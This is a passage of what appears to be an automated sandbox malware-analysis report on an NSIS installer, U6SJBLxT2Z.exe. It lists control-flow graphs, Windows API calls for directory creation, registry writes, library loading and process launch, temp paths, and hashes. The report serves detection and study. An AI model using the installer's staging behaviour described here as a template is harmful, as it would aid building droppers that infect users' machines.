                                                                                                                                                                                                  • Instruction ID: 3db4763bd34d6378758f0dea6881e25fdbecc032a5989a9cd586940b12637d70
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 898ce4c5b6941fe7d419b72eda9361d5450072f2bf0dde35a2139be17a2a5618
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13419471500118BACF10BFA5CD85DAE7A79EF45368B20423FF512B21E1DB3C89919A2D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 913 405479-40548e 914 405494-4054a5 913->914 915 405545-405549 913->915 916 4054b0-4054bc lstrlenW 914->916 917 4054a7-4054ab call 40644e 914->917 919 4054d9-4054dd 916->919 920 4054be-4054ce lstrlenW 916->920 917->916 922 4054ec-4054f0 919->922 923 4054df-4054e6 SetWindowTextW 919->923 920->915 921 4054d0-4054d4 lstrcatW 920->921 921->919 924 4054f2-405534 SendMessageW * 3 922->924 925 405536-405538 922->925 923->922 924->925 925->915 926 40553a-40553d 925->926 926->915
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                                                                                  • lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,004033B0), ref: 004054D4
                                                                                                                                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll), ref: 004054E6
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll
                                                                                                                                                                                                  • API String ID: 2531174081-206312887
                                                                                                                                                                                                  • Opcode ID: 595c87a6c684e3cc3ecfa7d9121cf0e7c522785301409aa9d6fada1dea414851
                                                                                                                                                                                                  • Instruction ID: 1ccddca99fa11d5427df38f31253403cabd393798f33362a1a37d4b4032a7ea7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 595c87a6c684e3cc3ecfa7d9121cf0e7c522785301409aa9d6fada1dea414851
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42219A71900518BBCB219F95DD85ACFBFB9EF45354F10803AF904B22A0C7798A908FA8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 927 405948-405993 CreateDirectoryW 928 405995-405997 927->928 929 405999-4059a6 GetLastError 927->929 930 4059c0-4059c2 928->930 929->930 931 4059a8-4059bc SetFileSecurityW 929->931 931->928 932 4059be GetLastError 931->932 932->930
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040599F
                                                                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004059B4
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004059BE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\Desktop, xrefs: 00405948
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040596E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                  • API String ID: 3449924974-26219170
                                                                                                                                                                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                  • Instruction ID: 2a6702a12d34049f0ed6173726a665453ef4396ebd7eb618d4b77e108423b323
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 720108B1C10219EADF019BA4D948BEFBFB8EF04314F00803AD544B6180D77896488BA9
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 933 406796-4067b6 GetSystemDirectoryW 934 4067b8 933->934 935 4067ba-4067bc 933->935 934->935 936 4067cd-4067cf 935->936 937 4067be-4067c7 935->937 938 4067d0-406803 wsprintfW LoadLibraryExW 936->938 937->936 939 4067c9-4067cb 937->939 939->938
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004067E8
                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                                                                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                  • Instruction ID: 2cc1ede9ae180511fd9dc47da010e879a2503ad1dada0433f9440106b5f2728e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F09670510119A7DB24BF64DE4DF9B366CAB00709F11447AA646F21D0EB7C9A68CBA8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 940 405f36-405f42 941 405f43-405f77 GetTickCount GetTempFileNameW 940->941 942 405f86-405f88 941->942 943 405f79-405f7b 941->943 945 405f80-405f83 942->945 943->941 944 405f7d 943->944 944->945
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F54
                                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034C3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F), ref: 00405F6F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • nsa, xrefs: 00405F43
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3B
                                                                                                                                                                                                  • "C:\Users\user\Desktop\U6SJBLxT2Z.exe", xrefs: 00405F36
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\U6SJBLxT2Z.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                  • API String ID: 1716503409-2163190182
                                                                                                                                                                                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                  • Instruction ID: 6280ba3094977af7574bcd42248b285f756f81412eced5037130b5adcb3d4edb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55F03676B00204BFDB10CF55DD05E9FB7ADEB95750F10803AEE44F7150E6B499548B58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 946 6f771777-6f7717b6 call 6f771b5f 950 6f7718d6-6f7718d8 946->950 951 6f7717bc-6f7717c0 946->951 952 6f7717c2-6f7717c8 call 6f77239e 951->952 953 6f7717c9-6f7717d6 call 6f7723e0 951->953 952->953 958 6f771806-6f77180d 953->958 959 6f7717d8-6f7717dd 953->959 960 6f77180f-6f77182b call 6f7725b5 call 6f7715b4 call 6f771272 GlobalFree 958->960 961 6f77182d-6f771831 958->961 962 6f7717df-6f7717e0 959->962 963 6f7717f8-6f7717fb 959->963 986 6f771885-6f771889 960->986 964 6f771833-6f77187c call 6f7715c6 call 6f7725b5 961->964 965 6f77187e-6f771884 call 6f7725b5 961->965 968 6f7717e2-6f7717e3 962->968 969 6f7717e8-6f7717e9 call 6f772af8 962->969 963->958 966 6f7717fd-6f7717fe call 6f772d83 963->966 964->986 965->986 980 6f771803 966->980 975 6f7717e5-6f7717e6 968->975 976 6f7717f0-6f7717f6 call 6f772770 968->976 977 6f7717ee 969->977 975->958 975->969 985 6f771805 976->985 977->980 980->985 985->958 990 6f7718c6-6f7718cd 986->990 991 6f77188b-6f771899 call 6f772578 986->991 990->950 993 6f7718cf-6f7718d0 GlobalFree 990->993 996 6f7718b1-6f7718b8 991->996 997 6f77189b-6f77189e 991->997 993->950 996->990 999 6f7718ba-6f7718c5 call 6f77153d 996->999 997->996 998 6f7718a0-6f7718a8 997->998 998->996 1000 6f7718aa-6f7718ab FreeLibrary 998->1000 999->990 1000->996
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 6F771B5F: GlobalFree.KERNEL32(?), ref: 6F771DD4
                                                                                                                                                                                                    • Part of subcall function 6F771B5F: GlobalFree.KERNEL32(?), ref: 6F771DD9
                                                                                                                                                                                                    • Part of subcall function 6F771B5F: GlobalFree.KERNEL32(?), ref: 6F771DDE
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F771825
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6F7718AB
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F7718D0
                                                                                                                                                                                                    • Part of subcall function 6F77239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F7723CF
                                                                                                                                                                                                    • Part of subcall function 6F772770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F7717F6,00000000), ref: 6F772840
                                                                                                                                                                                                    • Part of subcall function 6F7715C6: wsprintfW.USER32 ref: 6F7715F4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3962662361-3916222277
                                                                                                                                                                                                  • Opcode ID: 119e6a91cd68eb1bf79edaa027152ac6594155c9155b416e4ee646f407d58bc0
                                                                                                                                                                                                  • Instruction ID: 83967a2e00f2d2e3ddf06cb04d1098f1851df6aafe51f46667fc3537a44c3aba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 119e6a91cd68eb1bf79edaa027152ac6594155c9155b416e4ee646f407d58bc0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB41CF715203049ADF309F749BA8BD677E8BF0A324F0441B6E9259E1C6DFF4A094CBA0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1003 402482-4024b3 call 402d3e * 2 call 402dce 1010 402bc2-402bd1 1003->1010 1011 4024b9-4024c3 1003->1011 1012 4024c5-4024d2 call 402d3e lstrlenW 1011->1012 1013 4024d6-4024d9 1011->1013 1012->1013 1017 4024db-4024ec call 402d1c 1013->1017 1018 4024ed-4024f0 1013->1018 1017->1018 1021 402501-402515 RegSetValueExW 1018->1021 1022 4024f2-4024fc call 40324c 1018->1022 1023 402517 1021->1023 1024 40251a-4025fb RegCloseKey 1021->1024 1022->1021 1023->1024 1024->1010
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr10DA.tmp,?,00000011,00000002), ref: 004024CD
                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr10DA.tmp,00000000,00000011,00000002), ref: 0040250D
                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr10DA.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp
                                                                                                                                                                                                  • API String ID: 2655323295-3033206974
                                                                                                                                                                                                  • Opcode ID: ed48aa08e15e3f1b1e62dec4412f31797a050ffb65cedb0a970eec5c5ca15cee
                                                                                                                                                                                                  • Instruction ID: 7edbd774ff12736b5c68cca40ff53a8b2e2340a941a441eef078c8e93cf21856
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed48aa08e15e3f1b1e62dec4412f31797a050ffb65cedb0a970eec5c5ca15cee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C11AF71E00108BEDB00AFA5CE49AAEBBB8EF44314F20443AF504B71D1D7B89D409A68
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00405D91: CharNextW.USER32(?,?,0042FA70,?,00405E05,0042FA70,0042FA70,75D43420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75D43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                                                                                                                                    • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                                                                                                                                                    • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                    • Part of subcall function 00405948: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne, xrefs: 00401640
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne
                                                                                                                                                                                                  • API String ID: 1892508949-1974295416
                                                                                                                                                                                                  • Opcode ID: e31fcadcab37bac22a81c9746c3fd4a69da7bcffd63bdc59142811eb2c8070a3
                                                                                                                                                                                                  • Instruction ID: d42e9ae115e382ed64a017e661d14a8570f8e1ce7a364987760287960e16c3b9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e31fcadcab37bac22a81c9746c3fd4a69da7bcffd63bdc59142811eb2c8070a3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B411DD31504110EBCF206FA5CD4199F3BB0EF25369B28493BEA51B22F1DA3E49819A5E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A30
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Error launching installer, xrefs: 00405A0D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                                  • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
